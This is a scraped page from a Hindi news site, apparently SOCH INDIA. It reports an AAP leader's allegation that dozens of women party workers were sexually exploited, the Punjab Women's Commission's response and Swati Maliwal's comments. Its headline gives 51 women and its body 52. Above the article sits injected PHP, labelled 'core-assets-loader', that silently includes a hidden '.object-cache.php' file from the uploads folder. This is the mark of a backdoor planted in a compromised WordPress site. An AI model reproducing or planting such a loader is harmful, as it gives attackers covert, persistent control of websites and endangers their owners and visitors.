add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); AAP की महिला नेता का ओराप, मेरा ही नहीं, 51 महिलाओं का हुआ यौन शोषण – SOCH INDIA
Menu

अपराध समाचार
AAP की महिला नेता का ओराप, मेरा ही नहीं, 51 महिलाओं का हुआ यौन शोषण

nobanner

 चंडीगढ़। आम आदमी पार्टी (AAP) की फिरोजपुर जिले की पूर्व कन्वीनर और स्टेट कमेटी मेंबर अमनदीप कौर ने आरोप लगाया है कि उनके समेत पार्टी की 52 महिला नेता और कार्यकर्ताओं के साथ AAP नेताओं ने यौन शोषण किया है। उन्होंने बताया कि इस बात की शिकायत उन्होंने पार्टी आलाकमान को चिट्ठी लिखकर भी की थी लेकिन कोई कार्रवाई नहीं हुई।

वहीं, पंजाब राज्य महिला आयोग ने पंजाब पुलिस के डीजीपी को पत्र लिखकर आम आदमी पार्टी के नेताओं द्वारा पंजाब में टिकटों के बंटवारे को लेकर महिलाओं के सेक्शुअल हरैसमेंट व अन्य प्रकार से परेशान किए जाने के मामले की जांच के आदेश दिए हैं।

AAP की महिला नेता का ओराप, मेरा ही नहीं, 51 महिलाओं का हुआ यौन शोषण

आयोग की चेयरपर्सन परमजीत कौर लांडरां ने अखबारों व इलेक्ट्रॉनिक मीडिया में लगातार आ रही खबरों के आधार पर इसे अत्यंत गंभीर मामला मानते हुए संज्ञान लिया है।

पंजाब महिला आयोग ने आम आदमी पार्टी पर लग रहे आरोपों पर संज्ञान लिया है, तो दिल्ली महिला आयोग का रवैया थोड़ा अलग दिखाई दे रहा है। दिल्ली महिला आयोग की अध्यक्षा स्वाति मालिवाल ने पार्टी नेता आशुतोष की संदीप के बचाव वाली टिप्पणी पर उन्होंने कहा कि मैं आशुतोष के विचारों से सहमत नही हूं लेकिन यह भी है कि महेश शर्मा को स्कर्ट वाले कॉमेंट के लिए आज तक क्यों नहीं तलब किया गया। आजम खान बुलंदशहर के मामले में क्यों नहीं तलब नही किया गया? इन मुद्दों पर राजनीति नही करनी चाहिए। आशुतोष को डिफेंड नहीं कर रही हूं। उन्होंने बिल्कुल गलत कहा। आशुतोष ने जो लिखा वो अशोभनिय है।

बता दें कि आशुतोष ने राष्ट्रपिता महात्मा गांधी, पूर्व प्रधानमंत्री जवाहर लाल नेहरू नेहरू का हवाला देकर संदीप कुमार का बचाव किया था।

Leave a Comment

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>